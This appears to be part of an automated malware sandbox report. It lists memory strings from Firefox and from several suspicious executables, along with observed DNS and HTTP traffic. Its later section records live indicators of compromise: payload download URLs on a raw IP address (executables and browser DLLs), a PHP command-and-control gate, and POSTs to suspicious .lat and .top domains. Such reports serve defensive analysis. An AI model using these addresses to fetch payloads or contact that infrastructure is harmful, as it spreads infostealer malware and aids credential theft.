"://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001C.00000002.3389538102.000001F4CA29B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3389538102.000001F4CA29B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3344466497.000001F4C3C55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: doff-text" data-l10n-args="{"user": "Google"}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"YouTube"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001C.00000002.3344466497.000001F4C3C55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: doff-text" data-l10n-args="{"user": "Google"}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"YouTube"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.3244944098.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376470000.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3352472754.000001F4C652B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3352472754.000001F4C652B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3352472754.000001F4C652B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3325687566.000001C5C2A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/Z equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3376613883.000001F4C894B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376613883.000001F4C891B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3325687566.000001C5C2A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3325687566.000001C5C2A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3376613883.000001F4C8931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic	DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: youtube.com
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.fivetk5vt.top
Source: global traffic	DNS traffic detected: DNS query: fivetk5vt.top
Source: global traffic	DNS traffic detected: DNS query: pancakedipyps.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: grannyejh.lat

Source: firefox.exe, 0000001C.00000002.3328507756.000001F4B686B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3344466497.000001F4C3C55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: 1c8dd6ecf9.exe, 0000000E.00000003.4509197578.000000000110F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: 1c8dd6ecf9.exe, 0000000E.00000003.4509197578.000000000110F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/N
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000E93000.00000004.00000020.00020000.00000000.sdmp, 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe(
Source: 1c8dd6ecf9.exe, 0000000E.00000003.4508866474.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4415308381.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4509197578.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4509426428.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 1c8dd6ecf9.exe, 0000000E.00000003.4508866474.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4415308381.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4509197578.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4509426428.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe$
Source: 1c8dd6ecf9.exe, 0000000E.00000003.4508866474.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4509197578.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4509426428.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe(
Source: 1c8dd6ecf9.exe, 0000000E.00000003.4508866474.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4509197578.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4509426428.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeWv
Source: skotes.exe, 00000006.00000003.4489099700.00000000057FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exeVVC:
Source: 1c8dd6ecf9.exe, 0000000E.00000003.4509426428.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4509197578.00000000010F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: 1c8dd6ecf9.exe, 0000000E.00000003.4508866474.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4415308381.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4509197578.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4509426428.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe:
Source: 6523f73121.exe, 00000009.00000002.3659341926.000000000069C000.00000040.00000001.01000000.0000000A.sdmp, 6523f73121.exe, 00000009.00000002.3670040217.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, 6523f73121.exe, 00000009.00000002.3659341926.0000000000654000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://185.215.113.206
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllo
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllK
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll7
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll3
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllg6
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, 6523f73121.exe, 00000009.00000002.3670040217.0000000000E93000.00000004.00000020.00020000.00000000.sdmp, 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, 6523f73121.exe, 00000009.00000002.3659341926.000000000069C000.00000040.00000001.01000000.0000000A.sdmp, 6523f73121.exe, 00000009.00000002.3690395511.000000000B6B2000.00000004.00000020.00020000.00000000.sdmp, 6523f73121.exe, 00000009.00000002.3659341926.0000000000654000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000E93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php-
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php=
Source: 6523f73121.exe, 00000009.00000002.3659341926.000000000069C000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpb5804fbe958a2f1ed25b2b2b804fExtension
Source: 6523f73121.exe, 00000009.00000002.3659341926.0000000000654000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpge
Source: 6523f73121.exe, 00000009.00000002.3690395511.000000000B6B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpo
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpq
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpx
